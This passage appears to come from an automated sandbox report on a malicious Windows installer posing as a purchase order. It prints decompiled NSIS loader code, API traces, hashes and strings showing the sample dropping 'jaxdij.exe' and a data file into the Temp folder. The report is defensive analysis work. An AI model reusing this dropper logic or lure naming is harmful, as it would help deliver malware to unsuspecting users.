                                                                                                                          • lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00000000), ref: 004037BF
                                                                                                                          • lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
                                                                                                                          • GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
                                                                                                                          • LoadImageA.USER32 ref: 0040389B
                                                                                                                            • Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66
                                                                                                                          • RegisterClassA.USER32 ref: 004038E2
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
                                                                                                                          • CreateWindowExA.USER32 ref: 00403933
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                                                                                          • GetClassInfoA.USER32 ref: 00403995
                                                                                                                          • GetClassInfoA.USER32 ref: 004039A2
                                                                                                                          • RegisterClassA.USER32 ref: 004039AB
                                                                                                                          • DialogBoxParamA.USER32 ref: 004039CA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                          • API String ID: 1975747703-3531433980
                                                                                                                          • Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                                                                                          • Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
                                                                                                                          • Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                                                                                          • Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 208 402c88-402cd6 GetTickCount GetModuleFileNameA call 4059d2 211 402ce2-402d10 call 405cfb call 405835 call 405cfb GetFileSize 208->211 212 402cd8-402cdd 208->212 220 402e00-402e0e call 402be9 211->220 221 402d16-402d2d 211->221 213 402f27-402f2b 212->213 228 402e14-402e17 220->228 229 402edf-402ee4 220->229 223 402d31-402d37 call 4031d5 221->223 224 402d2f 221->224 227 402d3c-402d3e 223->227 224->223 230 402d44-402d4a 227->230 231 402e9b-402ea3 call 402be9 227->231 232 402e43-402e8f GlobalAlloc call 406164 call 405a01 CreateFileA 228->232 233 402e19-402e31 call 403207 call 4031d5 228->233 229->213 234 402dca-402dce 230->234 235 402d4c-402d64 call 405993 230->235 231->229 259 402e91-402e96 232->259 260 402ea5-402ed5 call 403207 call 402f2e 232->260 233->229 256 402e37-402e3d 233->256 243 402dd0-402dd6 call 402be9 234->243 244 402dd7-402ddd 234->244 235->244 253 402d66-402d6d 235->253 243->244 246 402df0-402dfa 244->246 247 402ddf-402ded call 4060f6 244->247 246->220 246->221 247->246 253->244 258 402d6f-402d76 253->258 256->229 256->232 258->244 261 402d78-402d7f 258->261 259->213 268 402eda-402edd 260->268 261->244 263 402d81-402d88 261->263 263->244 265 402d8a-402daa 263->265 265->229 267 402db0-402db4 265->267 269 402db6-402dba 267->269 270 402dbc-402dc4 267->270 268->229 271 402ee6-402ef7 268->271 269->220 269->270 270->244 274 402dc6-402dc8 270->274 272 402ef9 271->272 273 402eff-402f04 271->273 272->273 275 402f05-402f0b 273->275 274->244 275->275 276 402f0d-402f25 call 405993 275->276 276->213
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00402C88(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423f8c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\New PO-RJ-IN-003 - Knauf Queimados.exe", 0x400);
				_t105 = E004059D2("C:\\Users\\alfons\\Desktop\\New PO-RJ-IN-003 - Knauf Queimados.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CFB("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\New PO-RJ-IN-003 - Knauf Queimados.exe");
				E00405CFB(0x42c000, E00405835("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f130 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BE9(1);
					if( *0x423f94 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406164(0x40b098);
						E00405A01( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403207( *0x423f94 + 0x1c);
							 *0x41f134 = _t65;
							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423f90 = _t110;
								 *0x423f98 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423f9c =  *0x423f9c + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417124; // 0x565e2
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405993(0x423fa0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403207( *0x417120);
					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031D5(0x417130, _t106); // executed
						if(_t83 == 0) {
							E00402BE9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f94 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BE9(0);
							}
							goto L19;
						}
						E00405993( &_v40, 0x417130, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417120; // 0x1d99f
							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423f94 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f130) {
							_v8 = E004060F6(_v8, 0x417130, _t106);
						}
						 *0x417120 =  *0x417120 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                                                                                          0x00402c96
                                                                                                                          0x00402c99
                                                                                                                          0x00402cb3
                                                                                                                          0x00402cb8
                                                                                                                          0x00402ccb
                                                                                                                          0x00402cd0
                                                                                                                          0x00402cd6
                                                                                                                          0x00000000
                                                                                                                          0x00402cd8
                                                                                                                          0x00402ce9
                                                                                                                          0x00402cfa
                                                                                                                          0x00402d01
                                                                                                                          0x00402d09
                                                                                                                          0x00402d0e
                                                                                                                          0x00402d10
                                                                                                                          0x00402e00
                                                                                                                          0x00402e02
                                                                                                                          0x00402e0e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402e17
                                                                                                                          0x00402e43
                                                                                                                          0x00402e48
                                                                                                                          0x00402e53
                                                                                                                          0x00402e55
                                                                                                                          0x00402e66
                                                                                                                          0x00402e81
                                                                                                                          0x00402e8a
                                                                                                                          0x00402e8f
                                                                                                                          0x00402eae
                                                                                                                          0x00402ebe
                                                                                                                          0x00402ed0
                                                                                                                          0x00402ed5
                                                                                                                          0x00402edd
                                                                                                                          0x00402eea
                                                                                                                          0x00402ef2
                                                                                                                          0x00402ef7
                                                                                                                          0x00402ef9
                                                                                                                          0x00402ef9
                                                                                                                          0x00402f01
                                                                                                                          0x00402f01
                                                                                                                          0x00402f04
                                                                                                                          0x00402f05
                                                                                                                          0x00402f05
                                                                                                                          0x00402f08
                                                                                                                          0x00402f0a
                                                                                                                          0x00402f0a
                                                                                                                          0x00402f0d
                                                                                                                          0x00402f14
                                                                                                                          0x00402f20
                                                                                                                          0x00000000
                                                                                                                          0x00402f25
                                                                                                                          0x00000000
                                                                                                                          0x00402edd
                                                                                                                          0x00000000
                                                                                                                          0x00402e91
                                                                                                                          0x00402e1f
                                                                                                                          0x00402e31
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d16
                                                                                                                          0x00402d16
                                                                                                                          0x00402d1b
                                                                                                                          0x00402d1f
                                                                                                                          0x00402d26
                                                                                                                          0x00402d2d
                                                                                                                          0x00402d2f
                                                                                                                          0x00402d2f
                                                                                                                          0x00402d37
                                                                                                                          0x00402d3e
                                                                                                                          0x00402e9d
                                                                                                                          0x00402edf
                                                                                                                          0x00000000
                                                                                                                          0x00402edf
                                                                                                                          0x00402d4a
                                                                                                                          0x00402dce
                                                                                                                          0x00402dd1
                                                                                                                          0x00402dd6
                                                                                                                          0x00000000
                                                                                                                          0x00402dce
                                                                                                                          0x00402d57
                                                                                                                          0x00402d5c
                                                                                                                          0x00402d64
                                                                                                                          0x00402d8a
                                                                                                                          0x00402d90
                                                                                                                          0x00402d99
                                                                                                                          0x00402d9f
                                                                                                                          0x00402da4
                                                                                                                          0x00402daa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402db4
                                                                                                                          0x00402dbc
                                                                                                                          0x00402dbf
                                                                                                                          0x00402dc4
                                                                                                                          0x00402dc6
                                                                                                                          0x00402dc6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402db4
                                                                                                                          0x00402dd7
                                                                                                                          0x00402ddd
                                                                                                                          0x00402ded
                                                                                                                          0x00402ded
                                                                                                                          0x00402df0
                                                                                                                          0x00402df6
                                                                                                                          0x00402df8
                                                                                                                          0x00000000
                                                                                                                          0x00402d16

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C9C
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,00000400), ref: 00402CB8
                                                                                                                            • Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,80000000,00000003), ref: 004059D6
                                                                                                                            • Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,80000000,00000003), ref: 00402D01
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48
                                                                                                                          Strings
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
                                                                                                                          • soft, xrefs: 00402D78
                                                                                                                          • Null, xrefs: 00402D81
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
                                                                                                                          • C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
                                                                                                                          • Error launching installer, xrefs: 00402CD8
                                                                                                                          • "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe", xrefs: 00402C88
                                                                                                                          • Inst, xrefs: 00402D6F
                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                          • API String ID: 2803837635-2710840123
                                                                                                                          • Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                                                                                          • Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
                                                                                                                          • Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                                                                                          • Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040585B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c50);
					E00405CFB();
				}
				E00405F5D(0x409c50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FF6(0x409c50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059B3(0x409c50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x424008;
						goto L32;
					} else {
						E00405CFB(0x40a450, 0x425000);
						E00405CFB(0x425000, 0x409c50);
						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
						E00405CFB(0x425000, 0x40a450);
						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x424008 =  &( *0x424008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c50);
								_push(0xfffffffa);
								E00404FE7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FE7(0xffffffea,  *(_t85 - 0xc));
				 *0x424034 =  *0x424034 + 1;
				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x424034 =  *0x424034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
					} else {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
						lstrcatA(0x409c50,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c50);
					E004055BC();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                          0x00401734
                                                                                                                          0x0040173b
                                                                                                                          0x00401744
                                                                                                                          0x00401747
                                                                                                                          0x0040174a
                                                                                                                          0x0040174f
                                                                                                                          0x00401757
                                                                                                                          0x00401773
                                                                                                                          0x00401759
                                                                                                                          0x00401759
                                                                                                                          0x0040175a
                                                                                                                          0x0040175a
                                                                                                                          0x00401779
                                                                                                                          0x00401783
                                                                                                                          0x00401783
                                                                                                                          0x00401787
                                                                                                                          0x0040178a
                                                                                                                          0x0040178f
                                                                                                                          0x00401791
                                                                                                                          0x00401793
                                                                                                                          0x00401798
                                                                                                                          0x00401798
                                                                                                                          0x004017a3
                                                                                                                          0x004017a3
                                                                                                                          0x004017b4
                                                                                                                          0x004017b6
                                                                                                                          0x004017b6
                                                                                                                          0x004017b7
                                                                                                                          0x004017b7
                                                                                                                          0x004017ba
                                                                                                                          0x004017bd
                                                                                                                          0x004017c0
                                                                                                                          0x004017c0
                                                                                                                          0x004017c7
                                                                                                                          0x004017d6
                                                                                                                          0x004017db
                                                                                                                          0x004017de
                                                                                                                          0x004017e1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004017e3
                                                                                                                          0x004017e6
                                                                                                                          0x00401840
                                                                                                                          0x00401845
                                                                                                                          0x004015a8
                                                                                                                          0x00402672
                                                                                                                          0x00402672
                                                                                                                          0x004028a1
                                                                                                                          0x004028a4
                                                                                                                          0x004028a4
                                                                                                                          0x00000000
                                                                                                                          0x004017e8
                                                                                                                          0x004017ee
                                                                                                                          0x004017f9
                                                                                                                          0x00401806
                                                                                                                          0x00401811
                                                                                                                          0x00401827
                                                                                                                          0x00401827
                                                                                                                          0x0040182a
                                                                                                                          0x00000000
                                                                                                                          0x00401830
                                                                                                                          0x00401830
                                                                                                                          0x00401831
                                                                                                                          0x0040184e
                                                                                                                          0x004028aa
                                                                                                                          0x004028aa
                                                                                                                          0x004028aa
                                                                                                                          0x00401833
                                                                                                                          0x00401833
                                                                                                                          0x00401834
                                                                                                                          0x00401492
                                                                                                                          0x00402224
                                                                                                                          0x00402224
                                                                                                                          0x00402224
                                                                                                                          0x00401831
                                                                                                                          0x0040182a
                                                                                                                          0x004028ac
                                                                                                                          0x004028b0
                                                                                                                          0x004028b0
                                                                                                                          0x0040185e
                                                                                                                          0x00401863
                                                                                                                          0x00401871
                                                                                                                          0x00401876
                                                                                                                          0x0040187c
                                                                                                                          0x00401880
                                                                                                                          0x00401882
                                                                                                                          0x0040188a
                                                                                                                          0x00401896
                                                                                                                          0x00401884
                                                                                                                          0x00401884
                                                                                                                          0x00401888
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401888
                                                                                                                          0x0040189f
                                                                                                                          0x004018a5
                                                                                                                          0x004018a7
                                                                                                                          0x00000000
                                                                                                                          0x004018ad
                                                                                                                          0x004018ad
                                                                                                                          0x004018b0
                                                                                                                          0x004018c8
                                                                                                                          0x004018b2
                                                                                                                          0x004018b5
                                                                                                                          0x004018be
                                                                                                                          0x004018be
                                                                                                                          0x004018cd
                                                                                                                          0x004018d2
                                                                                                                          0x0040221f
                                                                                                                          0x00000000
                                                                                                                          0x0040221f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k,"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k,00000000,00000000,"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                                            • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                                                                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                                                                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k$C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 1941528284-3268155009
                                                                                                                          • Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                                                                                          • Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
                                                                                                                          • Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                                                                                          • Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
